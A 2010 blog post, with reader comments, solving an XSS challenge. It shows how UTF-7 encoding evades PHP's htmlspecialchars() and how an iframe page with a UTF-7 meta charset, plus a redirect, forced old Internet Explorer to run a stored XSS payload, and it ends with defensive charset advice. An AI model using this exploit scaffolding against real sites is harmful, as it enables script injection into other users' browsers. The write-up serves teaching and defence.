Monday, October 25, 2010

XSS hackme challenge solution (part 2)

After revealing the first part of the solution for the XSS hackme challenge we'll discuss the second, last part. This time we'll talk about a IE-only vulnerability that allowed you to inject and run arbitrary Javascript code (XSS), but to properly exploit it we'll need:
  • a local web server (we'll need to host some pages)
  • Internet Explorer browser (6,7,8 will do)

The trick was in the...

Charsets. They allow us to represent characters (consisting of e.g letters, punctuation marks) that humans write or read as particular bytes that computers can process. For example letter 'A' in ASCII character set is represented by one-byte: 65 (decimal).
Character sets can be single byte (each character is represented by one byte - like ANSI) or multi byte (like UCS-2, UTF-8). Character sets by themselves do not pose any security problems - they just offer a way to translate letters to byte streams and vice versa. We could have a problem though with the metadata. For example: given an arbitrary byte stream, how do you know which letters do they represent? If you don't know the charset upfront, you can only guess. And unfortunately, computers sometime have to guess. As you will see, we can use this to our advantage.


Comments posted to our vulnerable shoutbox application were escaped using htmlspecialchars() function. This was done to protect us from XSS. The protection worked fine in most cases, unless we looked at the details. What does htmlspecialchars() do? Let's look at the manual:
This function is useful in preventing user-supplied text from containing HTML markup, such as in a message board or guest book application.
The translations performed are:
  • '&' (ampersand) becomes '&'
  • '"' (double quote) becomes '"' when ENT_NOQUOTES is not set.
  • ''' (single quote) becomes ''' only when ENT_QUOTES is set.
  • '<' (less than) becomes '&lt;'
  • '>' (greater than) becomes '&gt;'
It replaces a few characters with HTML entities. Notice the word characters - not bytes. We pass a string (byte array) to it and it treats them as characters - but what encoding does it use to know which byte represents "<" character so it can be escaped? It accepts the charset parameter:
charset - Defines character set used in conversion. The default character set is ISO-8859-1.
For the purposes of this function, the charsets ISO-8859-1, ISO-8859-15, UTF-8, cp866, cp1251, cp1252, and KOI8-R are effectively equivalent, as the characters affected by htmlspecialchars() occupy the same positions in all of these charsets.
We didn't specify any charset in the code, so it assumes that given data is in ISO-8859-1. But what charset is it actually in?


The application doesn't care. The Content-Type header doesn't include the charset.
$ wget -S -O /dev/null
--2010-10-25 15:13:39--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Mon, 25 Oct 2010 13:13:37 GMT
  Server: Apache/2
  Vary: Accept-Encoding
  Connection: close
  Content-Type: text/html
Length: unspecified [text/html]
Also there isn't any meta http-equiv charset in the HTML head (these meta elements serve as a fallback if server doesn't supply this information in the headers)
// we don't have this
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
So the browsers displaying the content (they display characters, not bytes) have to guess what charset is being used based eg. on your language settings, the contents of the page (old browsers used to do that) or the context the page is called in. And this is the weak point that we'll use.

Meet UTF-7

UTF-7 is an ugly charset. Basically it's a Unicode representation in 7-bits. Handy when you want to send MIME e-mail, but not very useful anywhere else. What is really nasty about it is that it replaces our < and > characters with something completely different:
So if we send an attack string encoded in UTF-7 and the server escapes it defaulting to ISO-8859-1, it will never modify the damn thing at all. Because, for htmlspecialchars() the string contains only safe +,A,D,w,- and other characters and not those dangerous < and >.

So we can add any script encoded in UTF-7 as a comment (and many of you did). Now we have a UTF-7 encoded stored XSS payload on the server. If a browser renders shoutbox.php as UTF-7, the script will run. If anyone has a browser which defaults to UTF-7, he's vulnerable. But no current browser defaults to UTF-7, and for a good reason (there were many UTF-7 attacks in the past)!

To run the script we have to trick the browser into believing that UTF-7 is the right charset for our shoutbox. As long as our page doesn't specify any charset in server response, we're lucky - there is a way.

Let's frame them

When a browser has to guess the charset of a document in a frame, some browsers tend to inherit the charset from the parent document (for legacy reasons, where frames were used as a navigational tool to serve contents of the same site). So, all we have to to is to make our own proper document with UTF-7 charset and make an <iframe> with our shoutbox.php script. This is the full document:
    <meta http-equiv="content-type" content="text/html;charset=utf-7">
    <iframe width=500 height=600 src=""></iframe>
Save it somewhere under a document root of your local web server and simply call it (e.g. http://localhost/utf7exploit.html ) .

You'll quickly find out that it only works in IE6 :( Firefox 2 fixed charset propagation bug and it doesn't inherit charsets across frames on a different domains. Same for IE8. See Secunia advisories for more info. So, you could exploit it, but you'd have to plant a page on a same domain as shoutbox.php. However, IE8 patched it wrong and we can still exploit it from a different (our own) domain.

UTF-7 Redirection attack

This vulnerability has been discovered by It's a simple trick - instead of calling a different domain with a shoutbox.php script in iframe source, we call our own PHP script which redirects to a different domain using HTTP Location header. And it's enough for IE6,7,8 to think that we're on a same domain, so they will happily assume that they should inherit UTF-7 charset. As simple as that. The bug is to be fixed only in IE9 (which means that WinXP users will never get the patch)!

Update 3.08.2011: As noted by @randomdross, current IE versions 6-8 have fixed this vulnerability and the attack does not work anymore - there is no charset inheritance anymore. I've tested on IE7 / Win XP SP3 with all current patches and it's true (However, IE7 on SP2 is still vulnerable). Contrats, Microsoft for fixing this!

The full code is:
// utf7exploit.html
    <meta http-equiv="content-type" content="text/html;charset=utf-7">
    <iframe width=500 height=600 src="redirect.php"></iframe>

// redirect.php
To exploit the vulnerability you have to:
  • inject a UTF-7 XSS payload in the shoutbox.php comment or author field
  • create a UTF-7 webpage on your domain with iframe pointing to redirect script
  • redirect has to issue Location header pointing to shoutbox application
And that's it. Full-blown stored XSS vulnerability working on Internet Explorer.


To be able to run JS we had to alter the context of our payload. This time we changed the charset - we used an exotic one that encodes "<" and ">" differently. By manipulating the context we were able to overcome the escaping mechanism used by htmlspecialchars(). It's important to remember that escaping is only successful if the algorithm knows the right context. It was exploited in the past (see e.g slide 31 of SQL injection presentation) and will be in the future. Plus, we've found a weak spot in Internet Explorer that allowed us to force a charset for a web page on a different domain. Putting these two together, we found a complete stored XSS vulnerability working on all current IE versions.

If you're developing applications, always remember to:
  • emit the HTTP Content-Type header with a charset
  • if not, use the <meta> element with a charset (it should be the first <head> element, even before the <title>!)
And stay away from UTF-7 (it's ugly) and IE (unless you'd like to be vulnerable for years). If you're interested in UTF-7-based XSS, I cherry-picked some delicious links on UTF-7.

I hope you enjoyed my first XSS challenge, I really had fun preparing it. It takes a bit of time, but I think it pays off. Would you like some additional challenges in the future? Let me know in the comments!


Regex84 said...

Very educational, thx

skeptic_fx said...

Yes Koto ! Additional XSS Challenges please :)

i_hack_sites said...

Thanks, explained it well. Now I know why my UTF-7 injection was failing. :)

disqus_NRd7Y5OOEW said...